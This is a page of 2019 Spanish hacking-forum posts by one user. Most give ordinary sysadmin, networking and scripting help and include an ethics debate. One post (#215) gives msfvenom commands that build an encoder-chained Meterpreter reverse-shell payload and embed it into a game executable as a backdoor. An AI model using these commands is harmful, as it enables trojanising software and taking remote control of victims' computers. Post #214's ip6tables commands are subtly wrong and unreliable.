Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - animanegra

Páginas 1 ... 9 10 11 12 13 ... 19
#201
Dudas y pedidos generales / Re:No puedo ejecutar archivo PHP
Mayo 03, 2019, 04:29:09 AM
Lee lo que pone en la salida de error, no puedes utilizar la función mail porque no tienes configurado un servidor de smtp. Es un servidor que se encarga de conectarse a otros servidores de correo y poder realizar los envíos de email. Si no quieres poner y configurar un servidor de correo en tu maquina y quieres seguir usando la funcion mail, tienes dos opciones (como te dice en la salida de error).Configurar otro servidor de correo que te permita conectarte para realizar el envío cambiando los parámetros en el fichero php.ini o mediante configuración de variables en programa mediante ini_set.  También, podrías utilizar otra librería que permita conectarse a servidores de correo autenticados para realizar el envío, como php_mailer (bueno o programártela tu).
Yo, por simplicidad, tiraría de php_mailer. Te conectas a un servidor de correo como gmail con tus credenciales y envías correo al remitente que desees y con el texto que desees.
#202
Hacking / Re:Tweetshell - Revienta cuentas de Twitter con fuerza bruta
Abril 29, 2019, 04:25:48 AM
¿Cuantos intentos fallidos permite hacer twitter? ¿Crea un nuevo circuito cada vez que hace una conexión o los prehace y después los utiliza? ¿Habéis probado y llega a las 400 pass por minuto usando 20 hilos? Me parece una cifra bastante alta si el bypass funciona haciendo un nuevo circuito tor en cada bloqueo.
#203
Off Topic / Re:Underc0de Quotes - Comparte tu frase favorita!
Abril 17, 2019, 01:47:51 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
"Dale un pez a un hombre y comerá hoy, dale una caña y enséñale a pescar y comerá el resto de su vida"

Creo que representa de alguna forma el espíritu de nuestra comunidad  :)

Saludos!
Esto me recuerda a la de:

"Dale un pez a un hombre y comerá hoy, dale un hombre a un pez y comerá durante 6 meses"

#204
Dudas y pedidos generales / Re:Consulta, solo por curiosidad
Abril 17, 2019, 01:45:32 PM
Una forma de implementar es:

1 La página pide un identificador de transacción (un número, el 4 por ejemplo) al banco diciendo cuanto dinero tienes que pagar.
2 Te redirige a la página del banco con el número 4 en la página del banco donde te pone lo que tienes que pagar.
3 Tú metes los datos en la página del banco con lo que te autenticas como usuario de una tarjeta.
4 Tras meter los datos, el banco da el OK si tienes dinero, marca la transacción numero 4 como pagada.
5 Te devuelve a la pagina original donde estabas y antes de cargar la página el servidor de autobuses hace una petición al banco preguntando por el número 4 y su estado.
6 Si la transacción numero 4 del banco ha dado "OK esta pagado" el pago está hecho y te da tu asiento de autobus.
#205
Off Topic / Re:Underc0de Quotes - Comparte tu frase favorita!
Abril 17, 2019, 04:10:29 AM
En este contexto me debato entre dos:
"'Out of everything I've lost, I miss my mind the most" y "Try harder".
#206
Dudas y pedidos generales / Re:Duda sobre un ban de un servidor de juegos
Abril 13, 2019, 06:43:59 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como ustedes dijeron que era una identificador que el programa habia puesto en mi pc, al estar congelado cualquier identificador se borraria al reiniciar, pero para mi sorpresa fue que el servidor de juegos me sigue prohibiendo el acceso, aún usando la VPN.
Como es qué funciona este ban?

Al reiniciar la maquina virtual en el estado anterior ¿El programa estaba ya instalado o lo volviste a instalar?
#207
Dudas y pedidos generales / Re:como pasar archivos de una maquina virtual a ordenador?
Abril 09, 2019, 02:52:10 PM
Te doy algunas formas que puedes usar:

1 Desde virtual box, haciendo un virtual folder con la interfaz en la maquina virtual.

2 Via ssh, habilita el sshd en kali y utilizas un cliente que permita conectarte en el windows como:

putty
filezilla

3 Via FTP habilitas en kali un servidor ftp y te conectas desde windows con un cliente de ftp:

navegador web
filezilla

4 Usando nc en kali linux para abrir un puerto al que vuelcas el contenido del archivo:

Código: text

nc -l -p puerto < archivo.txt


Y usando un cliente que te permita conectarte a ese puerto desde windows:

navegador web usando en la URL http://ip_kali:puerto
usando cliente nc en windows haciendo:

Código: text

nc ip_kali puerto > archivo.txt
#208
Python / Re:BreadBad: Geolocalizar una dirección IP, A traves de tu consola con python
Abril 09, 2019, 06:28:20 AM
El código hace una petición a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Se puede ver en la siguiente linea:

Código: text

loads(urllib.urlopen("http://ip-api.com/json/"+self.ip).read())


Y rellena los datos en una estructura para la salida. Procesa para dejar todo muy guai.

El servicio online ese esta brutalísimo y devuelve datos en JSON de la ip para que los importes directamente o lo scriptes fácilmente e integres en aplicaciones.

En realidad el programa python es bastante equivalente a hacer esto en ejecutar esto en la consola bash (Con sus diferencias evidentes, esto son los datos en bruto puestos semi bonitos y utilizando herramientas del propio linux):
Código: text

animanegra@taco:~/$ curl "http://ip-api.com/json/www.google.com" 2> /dev/null | json_pp
{
   "lon" : 2.35222,
   "zip" : "75000",
   "country" : "France",
   "timezone" : "Europe/Paris",
   "region" : "IDF",
   "as" : "AS15169 Google LLC",
   "lat" : 48.8566,
   "countryCode" : "FR",
   "isp" : "Google LLC",
   "query" : "216.58.213.132",
   "city" : "Paris",
   "org" : "Google LLC",
   "status" : "success",
   "regionName" : "Île-de-France"
}


Se puede empaquetar dentro de un programa bash de esta forma:
Código: text

#! /bin/bash
curl "http://ip-api.com/json/$1" 2> /dev/null | json_pp


Al que se le cambian permisos con +x y ya puedes ejecutarlo pasando como primer parámetro la IP o nombre del que deseas hacer la petición.
#209
Debates, Reviews y Opiniones / Re:Debate: Sí, yo siento aversión y vosotros qué opináis?
Abril 04, 2019, 01:12:58 PM
Hola, me ha salido un post un poco largo lo siento. :S
Me gustaría centrar un poco si no os importa el debate hacia ciertas partes, que a mi por lo menos me parecen más interesantes. Si no os parece bien pues lo echais a /dev/null y ya está. :D Lo que voy a escribir a continuación espero que sirva para plantear más preguntas que respuestas. Pocas veces hay oportunidades de hablar sobre ética hacker y voy a aprovechar citando algunas cosas que comentaba Gabriela. Esta entrada está generada con la idea de generar debate así que procurad leerlo en dicha tesitura, si no igual pensáis que habría que eliminarme :D Y no os quito razón, pero no por esta entrada. :)

Citar
que cada quien se cuide y tome las precauciones necesarias. Información hay de sobra si no se quiere ser víctima, y si no se toma las precauciones, que se sufra las consecuencias de su propia desidia

Planteo la siguiente pregunta ¿Y la ignorancia o falta de tiempo de alguien te da derecho a fastidiar la vida a otra persona?. ¿Cuando dices eso tienes en mente a por ejemplo una persona mayor? Me imagino a cualquier jubilado al que el banco le obliga a tramitar sus cuentas via internet y que como no, cae en un physhing y le roban el poco dinero que tiene de pensión. ¿Se lo merece también porque el robo es por su propio desden? Evidentemente, no va en la linea de juzgarte ni mucho menos, esto que comento va en la linea de debatir que cosas pueden estar bien o mal y si se está mirando todo el espectro del problema.

Por otro lado, aprovechando la coyuntura, cuando la víctima es una empresa, estado o grupo cuyo comportamiento o ideas que puede ser totalmente opuestas a las tuyas y considerando que no se debería de tolerar su comportamiento dándote una razón por la que hackearles. ¿El poder hacerlo te da derecho a hacerlo? ¿No es ese comportamiento algo autocrático? Podría llegarse a ver como pegar a alguien simplemente por tener mas fuerza y como le puedo mi ética esta por encima de él. Va obviamente orientado hacia el hacktivismo, ¿Cómo lo veis?

Citar
Lo que censuro y me da bastante aversión  son aquellos  que no saben ni cómo escribir una línea de código ni montarse sus herramientas, y muchos  menos manejar un malware. Es fácil detectarlos porque  tienen el morro de preguntar cosas obvias que cualquier manipulador de malware que se precie, debe saberlo. Hay que correr, pero primero hay que tener la humildad indispensable de aprender a caminar. Nadie nace aprendido.  Esto implica cumplir varias y duras etapas  de lectura y ejercicio antes de pensar en infectar a nadie.

Creo que el cambio notable que ha habido es que hace unos pocos años había una barrera de entrada bastante grande para acceder a determinada información. Ya solo el conseguir instalar un maldito linux y que te reconociese la tarjeta de red te convertía en casi una heroina. Y ahora acceden a las comunidades gente de todo el espectro de la sociedad. Antes el perfil de gente estaba repleto de gente algo GEEK cuya idea de hackear era la de conseguir derribar las barreras de entrada adquiriendo conocimiento y formar parte de la generación de dicho conocimiento. Pero la eliminación de la barrera de entrada hace que cada vez más entre en las comunidades gente con una posible menor capacidad técnica, que ven que pueden acercarse al tema del hacking de manera directa y que los medios venden como "usa este programa que haces click y ya hackeas algo". Por supuesto, esto se junta con que las comunidades de hacking atraen a todo el mundo que está enfadado con su pareja, amiga, profesor, etc... y ven una manera sencilla de venganza el hacer uso de él. Aparte la falsa sensación de anonimato que da Internet fomentado por los medios de comunicación son un buen caldo de cultivo para peticiones en esa dirección. De ahí lo que habéis comentado de proteger a la gente de si misma.

Creo que la pérdida de lo que se llamaba ética hacker tiene mucho que ver con todo esto. Los principios de realizar acciones en pos de la libertad de la información y del conocimiento han degenerado de una manera, igual algo lastimosa, hacia algo que creo que muchos estarán de acuerdo, no se puede tildar de hacking. La mitad de las peticiones de "quiero ser hacker y aprender" van seguidas de peticiones de programas automáticos para robar cuentas de facebook, twitter o correo electrónico. Cualquier persona usa un hydra, un ethercap, etc... y consigue un login válido y ya va por ahí autodefiniendose de super hacker porque ha conseguido alimentar su ego con eso sin plantearse los problemas que eso puede acarrear (Es un ejemplo algo burdo lo se, pero creo que se entiende lo que quiero decir). El problema es que al final esas son las inquietudes que tiene una buena parte de la sociedad, a algunos les pueden parecer algo superficiales pero el conjunto de la sociedad parece que va muchas veces en esa dirección. Pero también hay que tener en cuenta que mucha gente super válida empieza así.

No obstante, eso no tiene por que ser del todo malo (de hecho creo que es una gran oportunidad), ya que lo que representa es que las comunidades son accesibles y que la información se está extendiendo más y llega a un perfil de usuarios más amplio (Osea mas gente que puede aportar). Igual ahí es donde se tiene que hacer incapié en la ética y puede que dirigir hacia el aprendizaje. Si alguien hace una pregunta que no te gusta siempre tienes la opción de no dar dicha información y simplemente no contestar. O introducir una respuesta que le haga realizar algo, de forma que exista una conversación en la que vaya adquiriendo aprendizaje a lo largo de la contestación. Respuestas del tipo "Mirate esto a ver si es lo que buscas", prueba a ejecutar esto y mira la salida que te da, etc... De manera que se va generando conocimiento que después otra gente puede aprovechar. Lo que a uno le parece evidente igual hay que explicarlo de forma diferente y así ganamos todos. Y se termina generando un montón de información muy útil, relevante y sobre todo más cercana y comprensible a todo el mundo.

En algunos foros lo que se hace para filtrar y que sólo haya gente que aporte a la comunidad es que a determinadas partes del foro sólo se pueda acceder si aportas algún manual, noticia, etc... Puede ser una opción para que se pueda contestar de manera más generalizada a todo el mundo que esté en determinadas partes del foro sin plantearte el "¿Contesto a esta duda o en realidad lo va a utilizar para el mal?". Y de aquí una última pregunta ¿El uso que se le va a dar a algo que preguntan no os para a veces a la hora de dar respuestas? ¿Estaríais más agusto en un ambiente algo mas restringido en el que no tengas que plantearte determinadas preguntas éticas al contestar?

Perdón por la chapa y abrazos a todos. :)
#210
Dudas y pedidos generales / Re:linux posiblemente troyanizada? ...
Marzo 31, 2019, 07:07:14 AM
Creo que se están mezaclando cosas. Voy a ir una por una, y a ver si te parece coherente lo que voy diciendo.

Primero sobre las imagenes, el funcionamiento que comentas de que la imagen la pide el servidor a otro servidor, no es el funcionamiento normal. Lo más frecuente es que dentro de la página html que estás pidiendo al servidor tengas algo como:

Código: text

<img src="servidor/ruta_imagen"></img>


El navegador al leer eso, dice "Ah existe un recurso que es una imagen y tengo que pedirla a ese servidor y preguntarle por esa ruta". Y tu navegador, osea tu como cliente estas haciendo la petición a esa dirección remota (bueno que puede ser remota o del mismo servidor). Si fuese el servidor el que pidiese la imagen y te la diese a ti se vería código embebido y eso no suele ser lo más común. En paginas de noticias, google, redes sociales, etc... lo mas normal es que tengamos una brutalidad de conexiones paralelas a diferentes seridores. Normalmente muchos de ellos van hacia CDNs tipo amazonaws que proveen el contenido estático de la web.

Por otro lado, si piensas que la entidad ha instalado un soft espia, no es necesario un cero day. Osea a ver, un 0 day es un fallo en un programa que en ultima actualización consigue aprovecharse de un error que no se conoce para , normalmente, poder ejecutar código en una maquina (ya sea remota o local y con o sin escalado de privilegios). Si crees que alguien de dentro, insider, te ha instalado un troyano y te ha dado el equipo ya troyanizado no necesita de 0 day porque ya tenian acceso al equipo y a ejecutar comandos en el. En ese caso, entiendo que comentaste que el equipo fue usado por el personal de IT de tu empresa, ya  te hubiese instalado un programa de acceso remoto, que puede ser desde un programa de control del propio windows o linux (vnc, ssh, etc...) o programas orientados a utilizar redes de equipos mediante un sistema de control central (tipo lo que usan las botnets). Pero no necesitan de exploit porque ya tenian la posibilidad de ejecutar cosas en tu ordenador. De hecho lo mas normal si deseasen ejecutar codigo remoto en un linux sería haber hecho un usuario propio y poner el servicio de ssh (puerto 22 normalmente). No obstante dándote un paseo por los usuarios puedes ver si tienes usuarios con password que den acceso a tu ordenador y que no conozcas. De nuevo, deben de ser usuarios con password habilitado, porque ten en cuenta que linux crea un usuario por cada servicio abierto asi que no te sorprenda encontrar en el /etc/shadow monton de usuario que no son con el que haces login. Si ves un usuario que no debe de estar ahi y la empresa no tiene derecho a entrar puedes eliminarlo o cambiarle la password.

Ahora vayamos a el motivo por el que crees que tienes soft espia, o las razones por las que piensas que lo tienes. Parece que te está dando motivos a pensar que alguien esta haciendo cosas malas es esa IPv6 (que es una dirección local) en el puerto 123. Pero como te he comentado antes normálmente dicho puerto esta activo en todos los linux porque lo abre el servicio de ntp. Que a veces esté activo o inactivo puede tener que ver con si el programa está o no activado o si la tarjeta de red está o no activada. El programa puede a veces pararse por el motivo que sea, si el programa que abre el puerto se cierra ya no se ve el puerto abierto. Por otro lado, si la tarjeta de red esta down, tampoco verás el puerto abierto en esa dirección ya que la ipv6 la toma cuando el servicio de ipv6 ha dado ip a la tarjeta, como normalmente no tenemos IPv6 lo que hace es darle la dirección por defecto que es una IP de direccionamiento local que empieza por FE80.

Yo echaría un vistazo, como ya te he comentado antes, a todos lo programas que estén genrando conexiones y verificaria que son programas que tengo que tener instalados o que estoy utilizando.

Habiendo dicho esto, de nuevo ¿Que programa te aparece que esta abriendo el socket con el puerto 123 en la dirección IPv6? y de nuevo comento, si os vais a quedar mas tranquilos yo haría una instalación del sistema operativo y con eso resolvéis todos los problemas partiendo de un sistema limpio ya podéis vivir sin la sombra de ¿habrán entrado en mi equipos?. A veces entramos en estado un poco de "paranoia", nos pasa a todos y resulta más simple decidir formatear y reinstalar el sistema operativo y hacerlo nosotros mismos para asegurarnos de no tener problemas. Si se ha detectado cualquier entrada ilicita en el ordenador es prácticamnete la unica forma de asegurarse de que el equipo no tiene nada. Ya que siempre han podido meterte un rootkit que es una e las peores cosas que pueden pasarle a un ordenador. :)
#211
Dudas y pedidos generales / Re:linux posiblemente troyanizada? ...
Marzo 29, 2019, 05:44:56 AM
AXCESS esa dirección IPv6 es de su dispositivo. Es su tarjeta de red que tiene un servidor ntp, si haces un netstat -n en cualquier equipo linux aparecen normalemente los servidores en las direcciones IPv4 y las IPv6 y normalemente por defecto en los linux viene un ntp server (puerto 123) que se abre en todas las direcciones de todas las tarjetas de red. Por defecto casi todos los equipo windows y unix estan siempre utilizando IPv4 y IPv6 y siempre en IPv6 se le asigna una local, exista o no alguien dando direcciones en la red, que empieza por FE80::
#212
Dudas y pedidos generales / Re:linux posiblemente troyanizada? ...
Marzo 28, 2019, 01:34:22 PM
Me ha salido un post algo largo lo siento.
No das ninguna lista de IPs pero vamos que tu ordenador usa un montón de servicios, al igual que el de todos, tienes servicios de reloj, correo, dns, etc etc... que normalmente están habilitados para  que tu equipo funcione correctamente.

Voy a dar un repaso a la cantidad de conexiones que podemos encontrar de manera normal sin tener ningún troyano, ni Malware de por medio. Si te parece vamos a tratar de hacer un viaje a un click a la aplicación firefox en una pestaña en la que cargamos una página.

Para cargar una página web lo primero que tiene que hacer el ordenador es transformar el nombre que metes en tu URL a dirección IP que es lo que realmente entiende tu ordenador para poder comunicarse con el resto del mundo (los humanos somos de palabras y los ordenadores de numericos). Osea que como mínimo tienes una conexión con el DNS probablemente en el puerto 53.  Además la página que cargas a lo mejor tiene parte estática alojada en el servidor de esa pagina y parte en otros servidores como los de amazon. Por ejemplo, con lo que cargarías el código HTML de tu pagina y seguirías con una petición desde tu navegador hacia los nombres de cada una de las imágenes que están alojadas en otros servidores diferentes. SI además la página tiene publicidad pues tienes una conexión más por cada una de esas partes de la página normalmente alojadas en otros servidores (Todo esto seguramente serán varias conexiones a  puertos 80 http y 443 https).

Osea que solo con abrir el navegador, prácticamente realizamos 6 o 7 conexiones diferentes fácil usando distintos protocolos. Si además tienes algún plugin más, pues a lo mejor te está actualizando las noticias, el calendario, whatever, cada cosa de esas serán conexiones ya sean a puertos web o a los puertos donde se alojen esos datos. Acumlando sus respectivas conexiones DNS para sacar de cada cosa su dirección IP.

Por otro lado, como somos así, nos gusta tener el reloj de nuestro en hora pero no preocuparnos por ello (Viene por defecto así). tendremos comunicación con un servidor ntp puerto 123 de UDP, además normalmente los sistemas tienen dicho servidor en local y se comunica con los relojes de otros sitios. Como por defecto nuestras tarjetas trabajan en IPv4 y IPv6 tendremos probablemente de todos los servidores su puerto abierto en IPv4 y en IPv6. En el caso de IPv6 si no tenemos red configurada tendremos la dirección local por defecto, normalmente empiezan por fe80::.

Además de este servicio, en los equipos linux tendremos las actualizaciones que están en constante revisión de si hay nuevos paquetes, así que veremos varias conexiones hacia las rutas marcadas en el /etc/apt/sources.list en busca de nuevos paquetes. Esto abrirá conexiones a puertos 80 http, 443 https, y 21 ftp dependiendo de como tengamos configurada la máquina que nos da dichas actualizaciones.

Otro servicio que se suele tener habilitado en redes corporativas es el NFS o el SMB que son programas de comparticion de ficheros para que puedas acceder a las unidades de red con puertos abiertos TCP y UDP en los numeros 111, 1039, 1047, 1048 y 2049 en el caso de NFS y 445 y 139 en TCP en el caso de SMB. Estos conectarán cada uno con direcciones IP de las máquinas donde aloja vuestro contenido remoto.

SI además compartís cosas via FTP o SSH, que se suele hacer mucho también los puertos 21 y 22 estarán abiertos y con conexiones hacia los sistemas de disco duro de tus discos duros corporativos.
Y en este posible galimatias de puertos, IPs y conexiones no hemos hecho nada más que encender el ordenador, y poner una pagina web.

A la pregunta de si es normal ver muchas conexiones a pesar de que solo he puesto una dirección en el navegador, pues la respuesta es SI. A la pregunta de tu dirección de IPv6, pues tiene pinta de ser el servicio de NTP (el que se encarga de decir que hora es) en tu maquina local en su dirección de IPv6.

Lo que igual deberías hacer es mirar todos los programas que estan comunicandose con otra dirección IP. Los que puedes ver mediante el comando en la última columna del comando:

Código: text

sudo netstat -nputa


Asi solo salen las conexiones y no los sockets internos, menos basura en la salida mas limpieza en ver los datos relevantes. Con esto verificar que son programas que necesitas. A mi por ejemplo me sale lo siguiente:

Código: text

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22           0.0.0.0:*               LISTEN      1055/sshd           
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1033/mysqld         
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2864/cupsd          
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1456/exim4          
tcp6       0      0 :::22                :::*                    LISTEN      1055/sshd           
tcp6       0      0 :::80                   :::*                    LISTEN      1058/apache2        
tcp6       0      0 ::1:631                 :::*                    LISTEN      2864/cupsd          
tcp6       0      0 ::1:25                  :::*                    LISTEN      1456/exim4          
udp        0      0 0.0.0.0:631             0.0.0.0:*                           2866/cups-browsed   
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           563/avahi-daemon: r 
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           1042/minissdpd      
udp        0      0 0.0.0.0:68              0.0.0.0:*                           6001/dhclient       
udp        0      0 192.168.1.39:123        0.0.0.0:*                           5994/ntpd           
udp        0      0 127.0.0.1:123           0.0.0.0:*                           5994/ntpd           
udp        0      0 0.0.0.0:123             0.0.0.0:*                           5994/ntpd           
udp        0      0 0.0.0.0:47344           0.0.0.0:*                           563/avahi-daemon: r 
udp6       0      0 :::5353                 :::*                                563/avahi-daemon: r 
udp6       0      0 :::40999                :::*                                563/avahi-daemon: r 
udp6       0      0 fe80::514e:bbcc:ce4:123 :::*                                5994/ntpd           
udp6       0      0 ::1:123                 :::*                                5994/ntpd           
udp6       0      0 :::123                  :::*                                5994/ntpd


Yo por ejemplo tengo puesto el apache2 con mysql  porque juego con servidores web, el exim4 por temas de correo y el cupsd porque soy servidor de impresora en mi casa. Aparece el ntp que es el servidor de tiempo, avahi-daemon que es el que hace temas de dns en algunas versiones de linux.
Las IPs que son todo 0.0.0.0 es que los servidores trabajan en todas las unidades de red con IPv4 y los ::: lo mismo para IPv6.

No obstante si no te fías de los que te han instalado el sistema, coge una versión limpia de linux e instalatela tu. Así terminas con todo problema en caso de duda. Y no compartas con nadie tu password de root. También es bueno tener chkrootkit y rkhunter que son programas anti malware, los pasas cada X tiempo y te miran un poco a ver si tienes troyanos conocidos. Además tienes el clamav que es un antivirus con el que podrás mirar posibles virus en tu sistema.

Sobre lo de tener un stuxnet en tu ordenador... pues tu sabrás si tu ordenador es tan importante para la NSA como una central nuclear de Iran. Que generalmente la respuesta suele ser no. :) Pero yo no te conozco, si eres Obama pues igual te deberías de preocupar un poco mas de tu seguridad, pero entonces tus dudas entiendo que no las harías en un foro y entiendo que ficharías a gente que se securize el sistema. :D Si eres tan importante como para que alguien utilice un arma de un solo tiro en tu ordenador deberías de pagar (y muy bién) a alguien que te securice tu sistema. :)

No se si te he dado algo de luz o solo sombras. Pero ve diciendo las dudas adicionales que tengas si quieres y se te ira contestando entre todos.
#213
Dudas y pedidos generales / Re:linux posiblemente troyanizada? ...
Marzo 28, 2019, 08:29:01 AM
Pásale al netstat la opcion -n que no resolverá los nombre, yo suelo usarlo poniendo -pan.  Y ejecútalo con privilegios de administrador para que te salgan todos los programas que están realizando conexiones.
#214
Dudas y pedidos generales / Re:linux posiblemente troyanizada? ...
Marzo 26, 2019, 12:30:52 PM
añade al netstat -p para saber el programa que está abriendo dicho puerto. Y así miras a que programa pertenece y si es lícito o no (probáblemente lo séa). No obstante, sino utilizáis en general ip version 6 con:

Código: text

ip6tables -p INPUT DROP;
ip6tables -p OUTPUT DROP;
ip6tables -p FORWARD DROP;


Te aseguras de que no se utiliza IPv6 en el ordenador. Ipv6 suele ser un protocolo poco implantado y en general en firewalls de empresas, etc.. no se suele hacer caso de él, lo que provoca que a veces se comentan fallos de configuración que después vienen a dar sustos.
#215
Dudas y pedidos generales / Re:Encoders metasploit
Marzo 21, 2019, 04:15:33 PM
mmmmmm, a ver si algo así puede servirte y es lo que quieres:

Código: text

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=1337 -a x86 --platform windows -e x86/shikata_ga_nai -f raw > /tmp/encode1
./msfvenom -p - -a x86 --platform windows -e x86/bloxor -f raw < /tmp/encode1  > /tmp/encode2
./msfvenom -p - -a x86 --platform windows -e x64/xor -f raw < /tmp/encode2  > /tmp/encode3
.... 301 lineas mas tarde ...
./msfvenom -p - -a x86 --platform windows -e x64/zutto_dekiru -f raw < /tmp/encode304  > /tmp/encode305


Por si acaso completo un poco, eso es el payload, para generar el ejecutable entiendo que deberás hacer algo así:

Código: text

./msfvenom -p - -x /tmp/quake.exe -k -f exe -a x86 --platform windows > /tmp/quakeconbackdoor.exe < /tmp/encode305


Si después de X encoders ejecuta correctamente, coméntalo para que se pueda poner el POST como comprobado.
#216
Dudas y pedidos generales / Re:Un programador Java ansiando respuestas
Marzo 13, 2019, 08:41:41 AM
Si, de hecho si te has dedicado al desarrollo o gestión de sistemas mejor. Lo principal para buscar los problemas a las tecnologías es entenderlas. Tomarse la seguridad como tener en memoria una serie de ataques que te has aprendido de memoria creo que tiene las patas muy cortas. Y el hecho de tirar de aprender a usar programas automáticos pues un poco lo mismo.
Igual, lo que toca ahora es empezar a mirar temas de fallos, igual con tu background empezar por errores web, SQLI, etc.. tira de maquinas virtuales y hackealas ( vulnhub ), y hazte tus propios servidores con errores para ir comprobando que problemas existen a la hora de desarrollar. Verifica tus propios desarrollos en busca de problemas.
Si eres mas de que necesitas que obliguen tira de certificaciones, OSCP o similares. Ahí tendrás un libro, un laboratorio y una meta que es sacar la certificación.
#217
Dudas y pedidos generales / Re:Como se oculta un atacante
Marzo 12, 2019, 06:04:54 AM
Pues en numerosas ocasiones la gente no se oculta. En otras, como por ejemplo en el caso de algunos c&c se utilizan servicios intermedios como twitter, irc, etc... que hacen de pantalla.

Mucha gente utiliza proxys (ya sean cifrados, sin cifrar. VPNs, tor,...). No obstante el anonimato en Internet, es bastante complicado conseguirlo. Muchas veces no tanto por la falta de herramientas, si no porque en general cualquier pequeño fallo en la forma de uso hace que dejes de ser anónimo (por no hablar de problemas derivados de exploits en los programas que usas que te suelen dejar en pelotas, como en su día tor browser que exponía las IPs en determinadas circunstancias).

Por otro lado, ten en cuenta que siempre en cualquier comunicación hay un camino (ya séa directo o indirecto) entre tu y el otro extremo, al final fíjate que tus paquetes tienen que llegar a él y los paquetes que envía él tienen que llegar a ti.

Resumiendo, si en algún momento estás pensando en algo así como conseguir riesgo 0 (tanto para una víctima como para un atacante), eso no existe. Como ejemplo tienes silkroad, todo estaba super escondido y al final pillaron a clientes del servicio cómo proveedores del servicio.
#218
Dudas y pedidos generales / Re:Comunicación entre dos programas
Marzo 10, 2019, 09:08:46 AM
Lo más sencillo es, haz un fichero. SI dentro del fichero te encuentras la palabra STOP (o la que se te ocurra), pues significa que otro programa ha escrito en él para que pares el bucle. Dentro del bucle simplemente te dedicas a abrir el fichero y leerlo. En caso de que esté vacío sigues en el bucle y si no pues continuas en él. Quien diche creas un archivo dice crea un FIFO.
#219
Dudas y pedidos generales / Re:Script en C para obtener contenido de paginas WEB
Marzo 07, 2019, 06:41:03 AM
yo tiraria de scripts en bash y sed, awk y curl es mucho mas directo. Voy poniendo comandos utiles y ya si eso vas mirando cada comando como se usa para hacer lo que quieras. Se que lo que voy poniendo de ejemplo no será exactamente lo que deseas hacer, pero implica hacer el mismo tipo de operaciones que deseas hacer. Pongo una muy breve explicación, si crees que debería hacer una guia me comentáis por aqui lo que deséais aprender y hago una entrada sobre ello con diversos ejemplos.

Para la peticion de la pagina puedes tirar de curl:
Código: text

curl URL -x POST -d "var1=value1&var2=value2"

En URL va la url de la pagina que deseas obtener, en -x puedes poner el método utilizado para la lectura de variables de esa página (POST o GET) y en -d van los pares variable valor separados por &.
Lo que obtienes es la pagina sin procesar, evidentemente, en html. Ahora dependerá de lo que desees hacer con esa pagina. Usando las pipes empiezas a hacer cosas.

grep permite filtrar lineas, por ejemplo si pongo:
Código: text

curl https://www.eldiario.es/ | grep "<img"


Imagina que solo queremos el src de las lineas con img porque queremos una base de datos con las imagenes de una página pues podemos usar sed.
sed permite sustituir las apariciones de ciertas palabras por otras y permite usar wilcards para expresar dichas palabras.

vamos a cambiar con sed la salida anterior para que todo lo que vaya antes de la palabra src nos lo comamos y la palabra src incluida.

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/


como vemos la salida es algo asi:

Código: text

....
="https://www.eldiario.es/fotos/Ray-Loriga-Sabado-entrevista-eldiarioes_EDIIMA20190227_0423_22.jpg" width="643" height="362" alt="Ray Loriga presenta 'S&aacute;bado, domingo', su nueva novela, en una entrevista con eldiario.es." /></noscript>
="https://www.eldiario.es/fotos/Caricatura-anonima-Emilio-Pardo-Bazan_EDIIMA20190304_0476_10.jpg" width="311" height="175" alt="Caricatura an&oacute;nima de Emilio Pardo Baz&aacute;n" /></noscript>
="https://www.eldiario.es/fotos/Maria-Sanchez-autora-Tierra-mujeres_EDIIMA20190303_0332_10.jpg" width="311" height="175" alt="Mar&iacute;a S&aacute;nchez, autora de 'Tierra de mujeres'" /></noscript>
="https://www.eldiario.es/fotos/Courtney-Love-Straight-to-Hell_EDIIMA20190301_0883_22.jpg" width="145" height="157" alt="Courtney Love en Straight to Hell (1987)" /></noscript>
="/bbtfile/18010_20160831Ph8xAs.jpg" width="313" height="50" alt="" /></noscript>
="https://www.eldiario.es/fotos/Herstoricas-Time-Out_EDIIMA20190304_0372_17.jpg" width="141" height="78" alt="Herstoricas Time Out" /></noscript>
="https://www.eldiario.es/fotos/Maria-Hervas-Time-Out_EDIIMA20190304_0369_17.jpg" width="141" height="78" alt="Mar&iacute;a Herv&aacute;s Time Out" /></noscript>
="https://www.eldiario.es/fotos/Libros-feministas-Time-Out_EDIIMA20190304_0370_17.jpg" width="141" height="78" alt="Libros feministas Time Out" /></noscript>
="https://www.eldiario.es/fotos/corbeau_EDIIMA20190214_0838_23.jpg" width="311" height="175" alt="Le corbeau 2" /></noscript>
="https://www.eldiario.es/fotos/mujer-conoce-capitan-Hoggie_EDIIMA20190301_0761_21.jpg" width="311" height="175" alt="Una mujer conoce al capit&aacute;n Hoggie" /></noscript>
....


imaginemos que ahora solo nos interesan de ahí las fotos de tipo jpg, pues toca el turno al grep otra vez:

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/ | grep jpg


Y ahora deseamos quitar todo lo que siga a jpg porque en realidad queremos solo el nombre de la imagen con su extension.

Código: text

curl https://www.eldiario.es/ | grep "<img" | sed s/".*src"/""/ | grep jpg | sed s/"jpg.*"/"jpg"/


nos devuelve esto:

Código: text

="/bbtfile/18010_20160831Ph8xAs.jpg
="https://www.eldiario.es/fotos/Herstoricas-Time-Out_EDIIMA20190304_0372_17.jpg
="https://www.eldiario.es/fotos/Maria-Hervas-Time-Out_EDIIMA20190304_0369_17.jpg
="https://www.eldiario.es/fotos/Libros-feministas-Time-Out_EDIIMA20190304_0370_17.jpg
="https://www.eldiario.es/fotos/corbeau_EDIIMA20190214_0838_23.jpg
="https://www.eldiario.es/fotos/mujer-conoce-capitan-Hoggie_EDIIMA20190301_0761_21.jpg
